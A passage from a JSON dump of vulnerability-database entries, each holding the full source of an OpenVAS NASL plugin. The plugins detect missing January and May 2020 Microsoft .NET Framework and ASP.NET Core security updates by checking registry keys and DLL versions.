due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework fails to validate input properly.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user. If the current user\n is logged on with administrative user rights, an attacker could take control of\n the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 4.8 on Microsoft Windows 10 version 1709.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4532935\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(edgeVer =~ \"^11\\.0\\.16299\")\n{\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n }\n\n key_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\n foreach key(key_list)\n {\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532935\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range 
= \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n }\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532935\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532935\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\")){\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.workflow.runtime.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n }\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T15:41:55", "description": "This host is missing a critical security\n update according to Microsoft KB4532938", "cvss3": {}, "published": "2020-01-15T00:00:00", "type": "openvas", "title": "Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4532938)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "modified": "2020-06-04T00:00:00", "id": 
"OPENVAS:1361412562310815894", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815894", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815894\");\n script_version(\"2020-06-04T08:47:11+0000\");\n script_cve_id(\"CVE-2020-0646\", \"CVE-2020-0605\", \"CVE-2020-0606\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 08:47:11 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 10:11:12 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4532938)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4532938\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft .NET Framework 
fails to check the source markup of a file.\n\n - Microsoft .NET Framework fails to validate input properly.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user. If the current user\n is logged on with administrative user rights, an attacker could take control of\n the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 3.5 and 4.8 on Microsoft Windows 10 version 1903 and Microsoft Windows 10 version 1909.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4532938\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(edgeVer =~ \"^11\\.0\\.18362\")\n{\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n }\n\n key_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework 
Setup\\NDP\\v4\\Full\\\");\n\n foreach key(key_list)\n {\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532938\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.9142\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.9142\" ;\n break;\n }\n ## https://support.microsoft.com/en-us/help/4532938\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n }\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532938\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.9142\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.9142\" ;\n break;\n }\n ## https://support.microsoft.com/en-us/help/4532938\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< 
dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532938\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\")){\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.workflow.runtime.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n }\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T15:41:53", "description": "This host is missing a critical security\n update according to Microsoft KB4535102", "cvss3": {}, "published": "2020-01-15T00:00:00", "type": "openvas", "title": "Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4535102)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310816552", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816552", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816552\");\n script_version(\"2020-06-04T08:47:11+0000\");\n script_cve_id(\"CVE-2020-0646\", \"CVE-2020-0605\", \"CVE-2020-0606\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 08:47:11 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 10:11:12 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4535102)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4535102\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework fails to validate input properly.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user. If the current user\n is logged on with administrative user rights, an attacker could take control of\n the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Microsoft Windows 7 SP1 and Microsoft Windows Server 2008 R2 SP1.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4535102/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nif(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n}\n\nkey_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\nforeach key(key_list)\n{\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532945\n ## https://support.microsoft.com/en-us/help/4532929\n ## https://support.microsoft.com/en-us/help/4532932\n ## https://support.microsoft.com/en-us/help/4532941\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.8832\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.8832\" ;\n break;\n 
}\n else if(version_in_range(version:dllVer, test_version:\"4.0\", test_version2:\"4.0.30319.36576\"))\n {\n vulnerable_range = \"4.0 - 4.0.30319.36576\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.6 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n }\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532945\n ## https://support.microsoft.com/en-us/help/4532929\n ## https://support.microsoft.com/en-us/help/4532932\n ## https://support.microsoft.com/en-us/help/4532941\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.8832\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.8832\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.0\", test_version2:\"4.0.30319.36576\"))\n {\n vulnerable_range = \"4.0 - 4.0.30319.36576\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.6 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && 
\"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532932\n ## https://support.microsoft.com/en-us/help/4532941\n if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.6 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.workflow.runtime.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-11T16:46:12", "description": "This host is installed with ASP.NET Core\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2020-01-16T00:00:00", "type": "openvas", "title": ".NET Core Multiple Vulnerabilities (Jan 2020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0603", "CVE-2020-0602", "CVE-2020-0606", "CVE-2020-0605"], "modified": "2020-01-24T00:00:00", "id": "OPENVAS:1361412562310816556", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816556", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; 
without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:microsoft:asp.net_core\" ;\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816556\");\n script_version(\"2020-01-24T07:57:30+0000\");\n script_cve_id(\"CVE-2020-0602\", \"CVE-2020-0603\", \"CVE-2020-0605\", \"CVE-2020-0606\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-24 07:57:30 +0000 (Fri, 24 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-16 11:32:54 +0530 (Thu, 16 Jan 2020)\");\n script_name(\".NET Core Multiple Vulnerabilities (Jan 2020\");\n\n script_tag(name:\"summary\", value:\"This host is installed with ASP.NET Core\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - An error when ASP.NET Core improperly handles web requests.\n\n - An error in ASP.NET Core software when the software fails to handle objects\n in memory.\n\n - Multiple errors in .NET software when the software fails to check the source markup\n of a file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user and conduct DoS attacks.\");\n\n script_tag(name:\"affected\", value:\"ASP.NET Core version 3.0.0, 3.0.1 and 3.1.0\");\n\n script_tag(name:\"solution\", value:\"Upgrade to ASP.NET Core to 3.0.2 or 3.1.1 or later.\n For updates refer the Reference link.\");\n\n 
script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://github.com/dotnet/core/blob/master/release-notes/3.0/3.0.2/3.0.2.md\");\n script_xref(name:\"URL\", value:\"https://github.com/dotnet/core/blob/master/release-notes/3.1/3.1.1/3.1.1.md\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0603\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0602\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows\");\n script_dependencies(\"gb_asp_dotnet_core_detect_win.nasl\");\n script_mandatory_keys(\"ASP.NET/Core/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\ncoreVers = infos['version'];\npath = infos['location'];\n\nif (coreVers =~ \"^3\\.0\" && version_is_less(version:coreVers, test_version:\"3.0.2\")){\n fix = \"3.0.2\";\n}\n\nelse if (coreVers =~ \"^3\\.1\" && version_is_less(version:coreVers, test_version:\"3.1.1\")){\n fix = \"3.1.1\" ;\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:coreVers, fixed_version:fix, install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-11T16:46:12", "description": "This host is installed with ASP.NET Core\n SDK and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2020-01-16T00:00:00", "type": "openvas", "title": ".NET 
Core SDK Multiple Vulnerabilities (Jan 2020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0603", "CVE-2020-0602", "CVE-2020-0606", "CVE-2020-0605"], "modified": "2020-01-24T00:00:00", "id": "OPENVAS:1361412562310816557", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816557", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:microsoft:.netcore_sdk\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816557\");\n script_version(\"2020-01-24T07:57:30+0000\");\n script_cve_id(\"CVE-2020-0602\", \"CVE-2020-0603\", \"CVE-2020-0605\", \"CVE-2020-0606\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-24 07:57:30 +0000 (Fri, 24 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-16 11:32:54 +0530 (Thu, 16 Jan 2020)\");\n script_name(\".NET Core SDK Multiple Vulnerabilities (Jan 2020\");\n\n script_tag(name:\"summary\", value:\"This host is installed with ASP.NET Core\n SDK and is 
prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - An error when ASP.NET Core improperly handles web requests.\n\n - An error in ASP.NET Core software when the software fails to handle objects\n in memory.\n\n - Multiple errors in .NET software when the software fails to check the source markup\n of a file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user and conduct DoS attacks.\");\n\n script_tag(name:\"affected\", value:\"ASP.NET Core SDK 3.0.x prior to 3.0.102 and 3.1.x\n prior to 3.1.101\");\n\n script_tag(name:\"solution\", value:\"Upgrade to ASP.NET Core to 3.1.101 or 3.0.102 or later.\n For updates refer the Reference link.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://github.com/dotnet/core/blob/master/release-notes/3.0/3.0.2/3.0.2.md\");\n script_xref(name:\"URL\", value:\"https://github.com/dotnet/core/blob/master/release-notes/3.1/3.1.1/3.1.1.md\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0603\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0602\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows\");\n script_dependencies(\"gb_asp_dotnet_core_detect_win.nasl\");\n 
script_mandatory_keys(\".NET/Core/SDK/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\ncoreVers = infos['version'];\npath = infos['location'];\n\nif (coreVers =~ \"^3\\.0\" && version_is_less(version:coreVers, test_version:\"3.0.102\")){\n fix = \"3.0.102\";\n}\n\nelse if (coreVers =~ \"^3\\.1\" && version_is_less(version:coreVers, test_version:\"3.1.101\")){\n fix = \"3.1.101\" ;\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:coreVers, fixed_version:fix, install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-10T17:44:08", "description": "This host is missing a critical security\n update according to Microsoft KB4552928", "cvss3": {}, "published": "2020-05-13T00:00:00", "type": "openvas", "title": "Microsoft .NET Framework Multiple Vulnerabilities (KB4552928)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1108", "CVE-2020-0605"], "modified": "2020-06-09T00:00:00", "id": "OPENVAS:1361412562310817116", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817116", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or 